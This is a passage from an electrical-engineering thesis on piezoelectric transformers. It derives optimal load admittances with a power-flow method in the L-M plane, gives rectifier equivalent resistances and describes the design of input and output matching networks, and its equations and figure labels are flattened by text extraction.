surfaces, Fig. 3.6. shows the mapped contours of the output-power surface and the intersection line, AB, of the input plane in the L-M plane. The function of line AB in the L-M plane is aL bM 2 g g 11 22 0 , (3.12) which is obtained by substituting Pin(L,M) = 0 into (3.4) and its slope = a/b. The maximal efficiency of the two-port network occurs along one of the lines passing through (L,M) = (1,0) and confined to the unit circle, as shown by the dotted line in Fig. 3.6. Obviously, the maximal efficiency of the two-port network will occur along the line segment from point O to point C, and its slope is defined as tan(180-). Because line OC is perpendicular to line AB, it follows that tan( ) 180 1 a b , (3.13) or tan Im[ ] Re[ ] b a Y Y Y Y 12 21 12 21 . (3.14) To simplify the analysis, line OC is defined as x axis. The relationships between (L,M) and (x,) are : ( ) L x x x Y Y a b + + 1 1 1 12 21 2 2 cos cos Re( ) (3.15) 43 Pout ( L,M ) 0 2 1 0 0 1 -1 M L 0.1 Fig. 3. 4. Output power plane in the L-M plane. The output power surface forms a paraboloid centered at (L,M) = (1,0), where maximum output power occurs and the load admittance YL = y22*. The contours of the output power plane are circles with center (L,M) = (1,0) in the L-M plane. max 0 2 1 0 0 1 -1 M L 0.1 Fig. 3. 5. Efficiency plot in the L-M plane. Although it is very difficult to find an analytical solution for the maximal efficiency in the L-M plane directly, the simple geometry of the input and output planes makes it possible to analyze the efficiency of the two-port network systematically. 44 L M Pin= 0 Pout = 0 1 -1 0 L = 1 x = 0 2 O 180 - x axis C x = -1 x = 1 AB Input-power contours L x 1 1 cos x Y Y Re ( ) 12 21 a b + 2 2 M x sin x Y Y Im( ) 12 21 a b + 2 2 Fig. 3. 6. Mapped contours of the input and output planes. The maximum efficiency of the two- port network will occur along the line segment from point O to point C, and its slope is defined as tan(180-). As a result, L and M can be represented by the functions x only, and the analysis is further simplified. 45 and M x x Y Y a b + sin Im( ) 12 21 2 2 . (3.16) Figure 3.7. shows the side view of the input and output plane cut by the plane, which is vertical to the L-M plane and contains line OC . Substituting (3.15) and (3.16) into (3.10), the output power surface in L-M plane is simplified to a parabolic curve along x axis which is shown in Fig. 3.7. Pout L M Pout x Pout x Poo x ( , ) ( , ) ( ) ( ) 1 2 (3.17) The lengths of OC and OD are equal to OC b + a 2 g g a 11 22 2 2 and (3.18) OD Pio Pin ( ,0) 1 g a 2g 11 22 . (3.19) The function of line CD is decided by ( OC ,0) and (0, OD ). Pin x OC cx ( ) ) + + Pio (1 x) = Pio (1 1 , (3.20) where c OC b + 1 2 a a 2 g g 2 11 22 , (3.21) and c is a positive constant. When Pin(x) = 0, x = -1/c. If x fell into the unit circle, the system would be unstable because Pin could be negative, while Pout would still remain than zero. In other words, the system is stable if 0 1 < < c . (3.22) The efficiency of the PT is + Pout(x) pin(x) Poo x Pio cx ( ) ( ) 1 1 2 . (3.23) The efficiency of the PT reaches its maximum at x 0 , where the first derivative of (3.23) is equal to zero. 46 x c c o + 1 1 2 . (3.24) L 0 and M 0 can be calculated from (3.15) and (3.16), employing x = x 0 . Once the values of L and M are determined for maximizing the efficiency, the load admittance is calculated by using G g L L M L + _ , 22 2 2 1 2 and (3.25) B b g L M M L + + _ , 22 22 2 2 2 . (3.26) 3.2.2 Adjustment of the Power-Flow Method for PTs For longitudinal mode PTs, the dielectric losses for Cd1 and Cd2 are usually insignificant compared to the mechanical loss R in the electrical equivalent circuit. The lumped circuit of the PT shown in Fig. 3. 8 (a)., does not include the parallel resistors at the input and output terminals of the PT. The Y parameters of this lumped circuit can be expressed as: Y j Cd Z M 11 1 1 + (3.27.a) Y Y n Z M 21 12 1 (3.27.b) Y j Cd n Z M 22 2 2 1 + , (3.27.c) where Z M is the impedance of the mechanical branch and is defined as 1 Z j M M M + . (3.28) The Linvill constant c in (3.21) becomes ( ) c b M M M M M a a 2g g 2 11 22 2 2 2 2 2 2 2 1 , (3.29) where g 11 = M , g 22 = M /n 2 , a = M 2 - M 2 , and b = 2 M M from (3.6). When c = 1, it indicates that x o = -1 from (3.24). Meanwhile, L o = 1+cos and M o = sin; L o and M o are calculated from (3.15) and (3.16), respectively. To calculate optimal load admittance Y LOPT = G LOPT + j B LOPT , L o and M o need to be substituted into (3.25) and (3.26) to obtain 47 G g L L M LOPT o o o + _ , 22 2 2 1 2 0 and (2.29.a) B b g L M M Cd LOPT o o o + + _ , 22 22 2 2 2 2 . (3.29.b) x Input and output power x=0 (L,M)=(1,0) Pout (x) x=1 x=-1 Pin (x) D C O Fig. 3. 7. Side views of the input and output planes on x-axis. The side views are cut by the plane, which is vertical to the L-M plane and contains line segment OC. The input and output power curves are functions of x only. Therefore, the efficiency curve is also a function of x. MAX is calculated when '(x) = 0 and x = xo. Then Lo and Mo are found, and the optimal admittance YLOPT is obtained from (Lo,Mo). c is called Linvill constant, and it is an index of stability. When c is greater than one, it indicates that the output power is positive while the input power is negative. Therefore, c must be less than one to ensure stability. 48 Cd2 1 : n Cd1 R L C ZM (a) L M 1 2 0 f = fs slope = O AB x = xo Pon P V OMAX IMAX 2 x o Pon 1 Poo Y j Cd Z M 11 1 1 + Y Y n Z M 21 12 1 Y j Cd n Z M 22 2 2 1 + = 1 (b) f = f+45 slope = 0 f = f-45 slope = 0 C c b + a 2 a 2g g 11 22 2 Cd B LOPT 2 G LOPT 0 Fig. 3.8. Adjustment of the power-flow method for PTs. For longitudinal-mode PTs, the dielectric losses for Cd1 and Cd2 are usually insignificant and result in the Linvill constant approach to unity. An output power limitation is added so that the maximum efficiency of the PT is calculated according to the maximum power handling capability of the PT. Therefore, at any given , x = xo is obtained, where line OC and normalized maximum output power contour Pon intercept. From the slopes of the zero input-power contours, the operating frequency increases counterclockwise. 49 As a result, the maximum efficiency of the PT, whose dielectric losses are very small, approaches unity but there is nearly no output power because of G LOPT 0. Theoretically, an inductor will resonate with the output capacitor at any operating frequency so that the output reactive power is zero. To prevent this situation, a condition is posed according to the following facts. A maximum input voltage of the PT is provided by the manufacturer to ensure that the ceramic material will not be depolarized or even broken. The power density or power handling capability of the PT can be estimated from its material properties [51]. Therefore, the adjustment for the power-flow method states that a maximal output power P OMAX is generated before its input voltage V IMAX reaches specified upper voltage bound. From this statement, a constant output power contour in the L-M plane is constructed and shown in Fig. 3.8 (b). Accordingly, the normalized constant output power is Pon P V OMAX IMAX 2 . (3.30) Thus, the maximum efficiency of the PT occurs at the intersection of the normalized constant output contour Pon and the x axis. x o is the intersection point and its value can be obtained from (3.17) to get x Poo Pon o 1 . (3.31) Similarly, the optimal load admittance can be calculated from (3.25) and (3.26). 3.2.3 Optimal Load Characteristics Generally, longitudinal mode PTs function as step-up transformers and are called the high- voltage PTs (HVPTs). The thickness extensional mode PTs sever as step-down transformers and are named low-voltage PTs (LVPTs). The power-flow technique is a unified method for calculating the optimal load terminations for both HVPTs and LVPTs. However, the output impedance of the HVPT exceeds 200 k and the operating frequency is under 200 kHz. It is unrealistic to use network analyzer, which is a 50- system, to measure the S parameters of the HVPTs. Although the two-port network parameters can be measured by using other methods [47], a conventional method to decide the optimal termination of the HVPTs had been proposed in [4,5,17]. Therefore, the optimal load characteristic of the HVPT could be a resistor only, and its optimal resistance equals the impedance of the output capacitor. Using this method to decide the optimal termination of the HVPT simplifies design procedures for the HVPT applications. On the contrary, the output impedance of the low-voltage PT is relatively closed to the internal resistance, R. To operate the LVPTs efficiently, the two-port flow method must be carried out to calculate the optimal inductive load. 3.2.3.1 Thickness Extensional Mode PT (LVPT-21) The optimal load characteristics of the LVPT-21 can be obtained by employing the power flow method. The LVPT sample used to demonstrate the load characteristics is a 2:1 50 piezoelectric transformer [16]. Its complete empirical model has been shown in Fig 2.11 (a) and two resistors Rcd1 and Rcd2 , representing the dielectric losses, are added to the input and output of LVPT-21. In Appendix C, a MATLAB program is presented to calculate the optimal termination at each frequency of interest by using the measured two-port parameters and the complete model of LVPT-21. In the beginning, the Linvill constant c is checked by the program; it is less than unity. Therefore, the adjustment of the power-flow method is bypassed in the program. Figure 3.9 shows several useful design curves calculated from measured two-port parameters and the complete model of LVPT-21 whose efficiency is maximized over the frequencies of interest. These normalized curves describe the characteristics of efficiency, voltage gain, input power, output power, input admittance, and load admittance. According to the simulation results, one of the most desirable operating frequencies is located between 1.91 and 1.92 MHz, because at that frequency band, the efficiency of the PT is maximized and the input power is maximized too under the normalized condition where V 1 = 1. For example, (L o , M o ) = (0.106, 0.158) calculated with two-port parameters at 1.92 MHz. From (3.25) and (3.26), the optimal load admittance and impedance are inductive and are equal to Y j LOPT f MHz 1 91 0 0659 00411 . . . , (3.32.a) Z Y R j L j LOPT f MHz LOPT f MHz MS MS + + 1 91 1 91 1 1093 68141 . . . . , (3.32.b) where R MS = 10.93 and L MS = 567 nH at 1.91 MHz. When the operating frequency is 1.92 MHz, R MS = 9.77 and L MS = 450 nH. Since the operating frequency is chosen between 1.91 MHz and 1.92 MHz, the optimal load impedance is selected as ( ) Z Y R j L j nH LOPT LOPT MS MS + + 1 10 500 . (3.32.c) The efficiency around fs = 1.86 MHz is higher than that in the other region, but the output power around fs is relatively small with V IN = 1. This means a lot of circulating current flowing between the input of the PT and its input sources at fs. As a result, the efficiency of the whole system is going to degrade. From Figs. 3.9 (a) and (d), the calculated results from the lumped model describe the trend of the characteristics, but the results can not faithfully reproduce the characteristics predicted by the two-port network of LVPT-21 when the power-flow method is studied. This is because the measured curves of two-port parameters vs. frequency for LVPT-21 are not smooth curves. This suggests that the parameters of the two-port network are very effective for determining the optimal load of the PTs, but using them in circuit simulations is not feasible. On the other hand, the complete lumped model of LVPT-21 has demonstrated its usefulness by verifying the characteristics such as efficiency, voltage-gain, and input admittance and it is practical to use it in circuit simulation. 51 (b) - 80 - 60 - 40 - 20 0 20 40 1.86 1.88 1.92 2.0 (Fs : MHz) 1.9 1.94 1.96 1.98 Phase of Y LOPT (degree) calculated with model calculated with two-port parameters (a) 0.02 0.04 0.06 0.08 0.1 0.12 1.86 1.88 1.92 2.0 1.9 1.94 1.96 1.98 Y LOPT : optimal load admittance (Fs : MHz) (c) P ON (watts) : normalized output power when input voltage = 1 Volt 0 P ON(MAX.) 0.04 0.06 1.86 1.88 1.92 2.0 1.9 1.94 1.96 1.98 (Fs : MHz) 0.02 Fig. 3.9. Characteristics of the LVPT-21 matched by using power-flow method. (a) matched load admittance. (b) its phase angle. (c) output power of the LVPT-21 when it is matched and input voltage = 1 Volt. The characteristics of LVPT-21 are calculated when load admittance is optimized and efficiency is maximized at every frequency. 52 0.6 0.7 0.8 0.9 0.95 1.86 1.88 1.92 2.0 1.9 (d) 1.94 1.96 1.98 Optimal efficiency 0 0.5 1 1.5 Voltage gain VGAIN (Fs : MHz) Fig. 3.9. (d) optimal efficiency and voltage gain. The efficiency calculated by the lumped model is higher than that of two-port parameters. However, the output power, determined by the matched load admittance of the LVPT-21, is too small when lumped model is used to calculate the matched load admittance. So, the adjusted power-flow method is employed to find out the optimal load of the PTs under a specified maximum output power. Although the efficiency, which is calculated by the complete lumped model and shown in Fig. 3.9 (d), is greater than that of the two-port parameters, the output power obtained by the formal is relatively small. It states that the Linvill constant c calculated by the complete lumped model is close to unity, and the adjusted power-flow method needs to be used to obtain specified output power from the PT manufacturer. From Fig. 3.9 (c), the P ON(MAX.) is the normalized maximum output power for LVPT-21, and its corresponding load admittance at each frequency is calculated by adjusted power-flow method shown in the previous section. From the specifications of LVPT-21, its maximum output power is 15 watts, and the reasonable input voltage should be around 50 Vrms. As a result, the normalized output power P ON is close to 0.03 watts, when input voltage of LVPT-21 is equal to unity. Figure 3.10 shows the simulation results by applying the adjusted power-flow method for both the complete lumped model and two-port parameters. By constraining the output power of the PT, the simulated load characteristics, voltage gain and efficiency of LVPT-21 show much better agreements for both 53 models than those shown in Fig. 3.9. The notch portions shown in Fig. 3.10 (c) occur at unwanted oscillation frequencies where the output power cannot reach P ON . Figure 3.11 illustrates simulated and measured efficiency and voltage gain of LVPT-21 with three matched load admittances, and they are found at operating frequencies of 1.91, 1.92, and 1.96 MHz, respectively. From Fig. 3.11., the measured results of voltage gain and efficiencies agree with the theoretical results obtained from the complete model of LVPT-21. Therefore, the lumped model can be very helpful in designing the converter employing PTs. 3.2.3.2 Longitudinal Mode PT (HVPT-2) The electrical equivalent circuit of HVPT-2 with two resistors added at the input and output ports of HVPT-2 is redrawn in Fig. 3.12 (a). In the beginning, the Linvill constant c is checked and found to be closed to unity. The real part of the optimal load admittance is nearly zero, as shown in Fig 3.12 (b). Therefore, the adjusted power-flow method has to be employed to decide the optimal load of HVPT-2. Taking HVPT-2 as an example, its V IMAX = 100 V RMS and P OMAX = 3 watts. Adding this information into the MATLAB program, the optimal load admittance is decomposed into a parallel combination of resistor and inductor. Figure 3.12 (c). shows that the inductance of the optimal load is approximately 1 H which is difficult and unrealistic to implement. Hence inductive loads are not suitable for the PT with very small dielectric loss and very high output impedance, like most of the longitudinal mode PTs or HVPTs. The conventional method to decide the optimal load terminations for the HVPTs assumes that the termination is resistive [4,5,17]. The derivation of the optimal resistive load for the PT around fs can be found in [17,22] and is obtained by circuit evolution. A new approach is introduced in the L-M plane. So it is possible to visualize the change from an arbitrary optimal load to a specific resistive load, and their relationship in the L-M plane. However, the PT must be operated around fs, which is the same assumption as the one made earlier. 3.2.3.3 Optimal Resistive Load for Longitudinal Mode PT The conventional method to decide the optimal load terminations for the PTs is to assume that the termination is resistive [5,8]. Figure 3.13 shows the detailed evolution of the model carried out to find the optimal loading of the PTs. 54 (b) calculated with model calculated with two-port parameters (a) (c) P ON (watts) : normalized output voltage when input voltage = 1 Volt (Fs : MHz) 1.86 1.88 1.92 2.0 1.9 1.94 1.96 1.98 0.01 0.02 0.03 - 80 - 40 0 40 Phase of Y LOPT (degree) 1.86 1.88 1.92 2.0 (Fs : MHz) 1.9 1.94 1.96 1.98 YLOPT : optimal load admittance under 15 watt fixed output power (Fs : MHz) 1.86 1.88 1.92 2.0 1.9 1.94 1.96 1.98 0.04 0.08 0.12 0.16 PoN(MAX.) Fig. 3.10. Characteristics of the LVPT-21 matched by using the adjusted power-flow method. (a) load admittance. (b) its phase angle. (c) output power of the LVPT-21 when it is matched and input voltage = 1 Volt. 55 0.5 1 Voltage gain under 15 watt fixed output power 1.86 1.88 1.92 2.0 (Fs : MHz) 1.9 1.94 1.96 1.98 0.7 0.8 0.9 1.86 1.88 1.92 2.0 (Fs : MHz) 1.9 1.94 1.96 1.98 : Optimal efficiency under 15 watt fixed output power calculated with model calculated with two-port parameters (e) (d) Fig. 3.10. (d) voltage gain. (e) optimal efficiency. To maximize efficiency and input power of LVPT-21 at the same time, two operating frequency zones are chosen and shown in the shaded areas. They are selected according to the requirements of optimized efficiency, reasonable voltage gain, and operation outside of unwanted vibration zones. Therefore, the possible frequency zones are around 1.96 MHz or the frequency zone between 1.91 and 1.925 MHz, to meet all the requirements. 56 LVPT-21 RMS YLOPT 1 ZLOPT= Z1.91 Z1.92 Z1.96 8 9 10 380 nH 440 nH 650 nH 0.4 0.5 0.6 0.7 0.8 1.86 1.88 1.92 2.0 1.9 (b) 1.94 1.96 1.98 ZLOPT = Z1.92 = 9 + 440 nH measured VGAINwhenZLOPT = Z1.92 (c) 1.86 1.88 1.92 2.0 1.9 1.94 1.96 1.98 0.5 0.6 0.7 0.8 0.9 ZLOPT = Z1.92 = 9 + 440 nH measured whenZLOPT = Z1.92 (Fs : MHz) (Fs : MHz) (a) L MS calculated with model measured results Fig. 3.11. Voltage gains and efficiency of LVPT-21 with matched loads calculated by adjusted power-flow method. (a) simulation setup where the optimal load impedance is composed of R MS and L MS . (b) voltage gain vs. frequency. (c) efficiency vs. frequency. (b) and (c) are obtained when the load admittance is equal to Z1.92. 57 (a) Cd2 7.3 pF Vin Cd1 811 pF 68.5 149.2 mH 37.75 pF Rcd1 Rcd2 615 k 66 66 kHz 68 kHz 70 kHz PIN , x 0.0001 watts 1 2 3 66 kHz 68 kHz 70 kHz 1 2 3 RMP = 1/Re [YLOPT], k 200 300 400 500 100 200 300 400 500 100 (c) (b) LMP = -1/ Im [YLOPT]/2//f, H 0 0.5 1 1.5 2 0 66 kHz 68 kHz 70 kHz 0.5 1 1.5 2 L MP R MP YLOPT Fig. 3.12. Characteristics of matched HVPT-2. (a) model of HVPT-2 with dielectric loss resistors Rcd1 and Rcd2. (b) characteristics calculated by the power-flow method. (c) characteristics calculated by the adjusted power-flow method. The calculated efficiencies for both methods are close to 96 %. The normalized input power PIN in (c) is two times higher than that in (b). Higher input voltage is needed to accomplish the same output power for (b) because of very high load resistance RMP. However, both methods need to have a big inductance (1H) which is difficult to realize. 58 R L C Cd1 Cd2 Zin Rload ZL n Cd2 2 R L C Cd1 Zin ZL Rload 2 n Zin R L C Rload n (1+q ) 2 2 p n Cd2 2 2 q p (1+q ) 2 p Cd2' ZL (a) (b) (c) Fig. 3. 13. Optimal termination of the PT under resistive load. (a) PT model with a resistive load. (b) reflecting the load and Cd2 to mechanical branch. (c) changing the parallel to series arrangement for the load. The maximum gain occurs when the reactive components inside the dashed box are resonant with each other. 59 Equations (3.33) to (3.35) show the voltage gain of the PT, and (3.36) shows the efficiency of the PT. For an arbitrary load resistor Rload, the maximum gain, V GAIN(MAX) , occurs when L resonates with C || Cd2' at fo, which is a function of Rload, because the input impedance Z IN is minimized: q Rload Cd P 2 , (3.33) Z R j L j C Z in L + + + 1 , (3.34) V Z Z Rload n q q j n Cd q Z GAIN L IN p p p in + + + _ , 2 2 2 2 2 1 2 1 1 ( ) ( ) , (3.35) [ ] [ ] + + Re Re ( ) Z Z Rload q n R R L IN p L 1 2 2 , (3.36) OPT LOPT LOPT R n R R + 2 2 , (3.37) where R s Cd LOPT 1 2 . (3.38) Assuming that fo is close to fs, the maximum efficiency is derived by equating the first derivative of (3.36) with respect to Rload to zero. The maximum efficiency of the PT is obtained when the parallel quality factor q p = 1, and Rload is equal to the matched load, R LOPT , which is the impedance of the output capacitor, Cd2, at s. 3.2.3.4 Optimal Resistive Load for Longitudinal Mode PT in L-M plane Since the load is assumed to be resistive, the imaginary part of the load admittance Y L is zero and Y L = G L +j B L : B b g M L M L + 22 22 2 2 2 0 . (3.39) The root locus of the above equation for L and M is shown in Fig. 3. 14. and is a much bigger circle than the contour of the output plane with a radius = 1. The function of the circle is ( ) L M r r 2 2 2 + + , (3.40) where r is the radius of the root locus of (3.40) and is defined as 60 r g b 22 22 . (3.41) Then M can be replaced by L and r from (3.40): M r L 2 2 (3.42) By using the above expression and the Y parameters at fs, it is possible to obtain the input and output functions with respect to the variable L only. Y 12 = Y 21 and they are resistive at fs. It means that b = 0 and the Y parameters can be rewritten as Y j Cd R 11 1 1 + , (3.43.a) Y Y n R 21 12 1 , (3.43.b) Y j Cd n R 22 2 2 1 + . (3.43.c) As a result, g R g n R and 11 22 2 1 1 , , (3.44) a j b Y Y n R + 12 21 2 2 1 (3.45) At the same time, the Linvill constant c in (3.21) is equal to 1 because no significant dielectric loss appears in the input and output capacitors, Cd1 and Cd2. From (3.20), the contour of the input plane in the L-M plane is perpendicular to L-axis and can be expressed as L=2 because c=1, and the slope of the contour is decided by tan -1 (a/b) which approaches infinity. When c = 1, the input plane cuts the zero output contour at (L,M) = (2,0) at fs, cuts the zero output contour at (L,M) = (1,1) at f +45 , and cuts the zero output contour at (L,M) = (1,-1) at f -45 . The distribution of fs, f +45 , and f -45 in the L-M plane resembles that in the G-B plot of the PT. The input and output power equations, tracking coordinates along curve AB in the L-M plane, can be rewritten as ( ) Pin L g a L g g a L g R L ( ) . 11 22 11 22 2 2 1 2 2 (3.46) 61 L M Pout = 0 1 -1 0 2 O AB L 0 2 input and output power R 1 2R 1 L r r L r Pout L ( ) ( ) + 2 2 2 Pin L ( ) ( ) L R 1 2 2 Pin L ( ) Pout L ( ) (LO, MO) O' : ( L, M) = (0,-r) r = b22 g22 ( ) L M r r 2 2 2 + + R 1 2 Fig. 3.14. Optimal resistive load for high-output-impedance PTs. For high-output-impedance PTs, the inductance of the matched load by the power-flow method is too large to realize in practical applications. As a result, a pure resistive load is assumed, and the optimal resistance is found in the L-M plane around fs. The part of the big circle with center (L,M) = (0,-r) denotes the root locus of the load admittance whose imaginary part is zero. In the middle of the figure, the input and output powers calculated along the big circle become functions of L only. The optimal resistive load is equal to the reciprocal of b22. 62 Pout L poo L L M poo L r L r n R n R L r r L r R L r r L r ( ) ( ) ( ) ( ) ( ) . _ , + + 2 2 2 2 4 1 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 (3.47) Pin(L) and Pout(L) are drawn in Fig. 3.14., the efficiency of the PT with resistive load only can be solved and becomes ( ) ( ) ( ) L L r M L L r r L r L + 2 2 2 2 2 . (3.48) The procedure used to find out the optimal load resistance where the efficiency of the PT is exactly the same as that stated from(3.20) to (3.24). Equating the first derivative of (3.48) to zero gives ( ) ( ) ( ) ( ) . 1 2 0 4 4 4 4 0 2 2 2 2 2 4 2 4 2 2 + + + r L r L L L r r L r r L r L r r (3.49) Then L is solved as ( ) L L r r r r r r r r r r o + + + + + 2 1 4 4 2 2 4 4 8 2 2 4 4 3 2 4 ( ) . (3.50) At the same time, M can be solved as ( ) ( ) M M r L r r r r r r r r r r r r r r r r r r o o + + + + + + + + + + 2 2 4 4 2 3 2 2 4 4 2 4 4 2 4 4 4 2 4 4 2 2 2 4 2 4 2 2 ( ) ( ) ( ) ( ) ( ) ( ) ( ) . (3.51) Substituting (3.50) and (3.51) to (3.25), the optimal conductance G OPT is found to be 63 G G g L L M g L M r g r r r r r g r r b OPT o o o o o + _ , _ , + + _ , _ , 22 2 2 22 22 3 2 2 22 22 1 2 1 2 2 1 2 2 2 1 1 ( ) . (3.52) Equivalently, the optimal load resistance Rload OPT is given as Rload G Cd OPT OPT S 1 1 2 . (3.53) Meanwhile, the maximum efficiency of the PT MAX with Rload OPT from (3.48) is MAX o o o OPT OPT L r M L r r g g b Rload Rload n R + 2 2 2 2 22 22 22 2 . (3.54) The theoretical and measured efficiency curves for different load resistance and optimal load resistance Rload OPT = 330 k are shown in Figs. 3.15 (a) and (b). Although the calculated and measured efficiencies have a 2% error, the maximum efficiency occurs when the load resistance approaches 330 k and the operating frequency is around fs. The curve of the measured efficiency is like a convex which is different from the simulated curve because of losing the nonlinear information of dielectric loss in the simulation model. This again [21] suggests that the dielectric loss is critical to determining the efficiency of the PTs. 64 0.7 0.8 0.9 68 kHz 69 kHz 70 kHz 71 kHz 72 kHz 100 k 300 k 500 k Rload Rload k OPT 1 330 s Cd 2 (a) (b) 0.88 0.92 0.96 100 k 300 k 500 k Rload Rload k OPT 1 330 s Cd 2 68 kHz 69 kHz 70 kHz 71 kHz 72 kHz Measured Simulated Fig. 3.15. Efficiencies of HVPT-2 with various resistive loads. (a) theoretical results. (b) measurement results. The maximum efficiency of HVPT-2 always occurs when the load resistance Rload OPT is equal to 330 k for a particular operating frequency. The other information is that of HVPT-2 decreases when the operating frequency increases. 65 If the adjusted power-flow method is applied to HVPT-2, the maximal efficiency is 97 %. However, a 1H inductor is needed because of the high output impedance of the HVPT. Because the calculated maximum efficiency of HVPT-2 is 95.7 %, it demonstrates that employing a matched resistive load can provide a highly efficient operation of the longitudinal PTs. The same analysis is carried out for the 1:1 acoustic filter transformer[19]. The calculated results are Rload OPT = 7.53 and MAX = 63.6 % because the term 2n 2 R = 2.15 which is close to the value of Rload OPT . If a resistive load is added to the output of the low-voltage PT, the highest efficiency is only 63.6 %. Comparing this result to the efficiency calculated from the power-flow technique in 3.2.3.1 shows that the efficiency calculated from power-flow methods is 24 % better than that obtained with the use of the conventional method [21]. 3.2.4 Equivalent Circuit of Output Rectifier Circuits and Loads When a nonlinear load is applied to the output of the PTs, there are several rectifier circuits interfacing with the output matching network. The objective is to derive the equivalent resistance, R EQ , for the rectifier circuit and load, R L so that the OMNs are built to match the R EQ to the optimal load admittance, Y LOPT , of the PTs. Functioning as a filter, the PT will screen out most harmonics. Therefore, the output voltage of a PT almost prefers a sinusoidal voltage source. Figure 3.16. illustrates the operating waveforms of the rectifier stage and the function of the OMN. To provide a dc current path through the half-wave rectifier, an inductor, L DC , is placed adjacent to the rectifier and serves as part of the OMN. Employing the first-order Fourier series approximation , the current of D 1 can be decomposed to i I I t D L L 1 2 2 + sin . (3.55) The dc output power is P I R O L L 2 . (3.56) For ideal component, P Oi = P O 1 2 2 2 2 _ , I R I R L EQ L L . (3.57) It follows that R 2 R EQ 2 L . (3.58) 66 Let Poi = Po R R EQ L 2 2 i I I t D L L 1 2 2 + sin (a) V AC I L i D1 (b) Po i D1 R L R EQ V AC - + L DC Poi Fig. 3.16. Operating waveforms of the half-bridge rectifier stage. (a) half-bridge rectifier and load resistor RL. (b) theoretical waveforms. From power balance, the equivalent resistance of REQ is found from the operation waveforms for the half bridge rectifier. Similar results can be obtained for the other type of rectifier circuits and are listed in Table 3.1. LDC is added to provide a dc current path and a part of the output matching network of PTs. 67 Table 3.1. Output rectifier stage. R L Current Doubler R L Half bridge R L Voltage multiplier R L Full- bridge with Voltage Load R L R R EQ L 8 2 R EQ R EQ R EQ R EQ R EQ R EQ R L = 1 32 R R EQ L 2 8 R R EQ L 2 2 R R EQ L 2 2 Full- bridge with Current Load 68 By using the same derivation, the equivalent resistances of other five different rectifier circuits are tabulated in Table 3.1. To determine the form factor of the output rectifier stage, two effects need to be discussed. One is the ratio of R EQ /R L . The other effect is caused by adding an inductor between the PT and the rectifier stage. For the LVPTs, the optimal inductive load could be a series or a parallel connection of the resistor and inductor. Using a parallel connection results in undesirable noise and ringing due to the stray capacitance among the winding of parallel inductor and the surface of the PT. So the series connection is more desirable. However, adding an inductor decreases the amplitude of the input voltage for the output rectifier stage. Therefore, the form factor of the full-wave rectifier with an inductor was set to 0.5 approximately. The reason why the full-bridge type rectifiers are employed is that the ratio R EQ /R L is higher than those of half-bridge and current doubler rectifiers. The higher the R EQ /R L , the lower the required voltage ratio M; accordingly, the voltage stress on the main switch is reduced. The half- wave and current doubler rectifiers have the same R EQ /R L ratio, but an extra inductor is required to provide a dc path for the former. From the ratios of R EQ /R L , the full bridge rectifier and voltage multiplier offer step-up voltage ratios, which are very useful for the high-voltage PT applications. 3.2.5 Design of Output Matching Networks Similarly, the half-bridge rectifier circuit is used to illustrate how to design the OMNs. The matching network could be a -type or an L-type as long as it contains the required inductor, L DC . The difference between the -type and L-type impedance matching networks is that the -type ones have another degree of freedom to decide the bandwidth of the matching networks. To explain the design of the OMN, an L-type OMN is introduced in Fig. 3.17. where Z L =1/Y L . Assuming Re [Z L ] is smaller than R EQ and q P is the parallel quality factor, q P is resolved from (3.59): 69 (a) REQ L DC Re [Z ] L C 2 j X L L - OMN ZL R EQ L DC C EQ L - OMN Z L (c) (b) L' DC C 2 j X L Z L REQ q P + 1 2 [ ] Re ZL q p L DC and EQ R REQ q P + 1 2 Fig. 3.17. L-type matching network. (a) objectives of the OMN; (b) and (c) derivation of OMN. Z L is the optimal load where the efficiency of the PT is maximized, and REQ is the equivalent resistance of the rectifier circuit and load. These impedances are obviously different, and hence, a matching network is necessary. The L-type matching network is simple, but can not cover a wide range of operating frequencies. It is suitable to be adopted in a constant-frequency controlled converter. 70 [ ] Re R EQ Z q L P + 1 1 2 , (3.59) q R L p EQ DC . (3.60) L DC is obtained from (3.60). Then the parallel of L DC and R EQ is rearranged to the series of the real part of Z L and an inductor, L DC . Because L DC resonates with C 2 at the switching frequency, C 2 can be derived easily. The imaginary part of Z L can be combined with C 2 at the switching frequency. Finally, the resultant OMN is composed of L DC and C EQ . Based on the optimal load admittance for the 1:1 acoustic filter transformer, Y LOPT , at 3.325 MHz and the equivalent impedance of the half-bridge rectifier stage in this section, both -type and L-type OMNs have been designed to maximize the efficiency of the PT. To obtain a monotonic curve for voltage conversion ratio versus frequencies, the selected matching networks are checked with the lumped model circuit of the PT by using the Pspice simulation program. The simulation results employing -type and L-type OMNs, respectively shown in [19] explain that the monotonic curve for voltage gain of the PT is obtained by using -type OMN. 3.3 Input Matching Networks The input matching networks (IMNs) form an interface circuit between the dc/ac inverter and input impedance of the PT with a certain load termination. The PTs are passive devices and are connected in series with the dc/ac inverters, which are switching amplifiers . For a conventional radio-frequency (RF) amplifier, the input of the amplifier is usually a signal-level periodical source. The function of IMNs for RF circuits is to match the source impedance to the input impedance of two-port networks with optimal terminations so that the transducer gains [40] of the two port networks are maximized. From the aspect of efficiency for the input signal source, the efficiency under matched condition is no more than 50 %. But the power dissipation in the source is much smaller than the loss in the RF amplifier circuit whose efficiency is maximized by the power-flow technique. Unlike the function of IMNs in the RF circuits, the function of IMN in a PT converter is not to ensure the maximum power transfer from dc/ac inverters to the input of the PTs. Instead, IMNs are used to decrease the reactive flow in the PTs and dc/ac inverters, or to make sure the zero-voltage switching is achieved to reduce the switching loss and noises in dc/ac inverters. 71 3.3.1 Input Impedance Characteristics for the PT 3.3.1.1 Thickness Extensional Mode PT (LVPT-21) Figure 3.18 (a). shows the input block diagram of the PT converter, including a dc/ac inverter, IMN, PT and its load. Based on the optimal load admittance, Y LOPT , for LVPT-21, at 1.91 MHz, the input admittance of LVPT-21 is drawn in Fig. 3.18 (b). Y Z j R j C j n IN IN IN IN + + + 1 0 0397 0 0266 1 1 2521 2 2 . . . . . (3.61) This is an example which demonstrates that the characteristics of the input impedance for the PTs are capacitive around the desired operating frequencies. The input admittances of LVPT-21 with the matched load at 1.92 MHz are shown in Fig. 3.18 (b) and (c), and they are always capacitive. These three matched input admittance curves are obtained from the calculation results employing the complete lumped model, measurement results directly from the impedance analyzer, and the calculation results with the two-port parameters measured form the network analyzer. They are similar in shape and values and this again verifies the usefulness of the lumped model. Figures 3.18 (d). and (e). illustrate the input admittances of LVPT-21 when series load resistance R MS changes from 5 to 150 at 1.91 and 1.92 MHz, respectively. Although the input admittance is still capacitive, the input admittances are not only load-dependent but also frequency-dependent. To further illustrate the relationship among Y IN , the load of the PT, and the operating frequency, 3-D 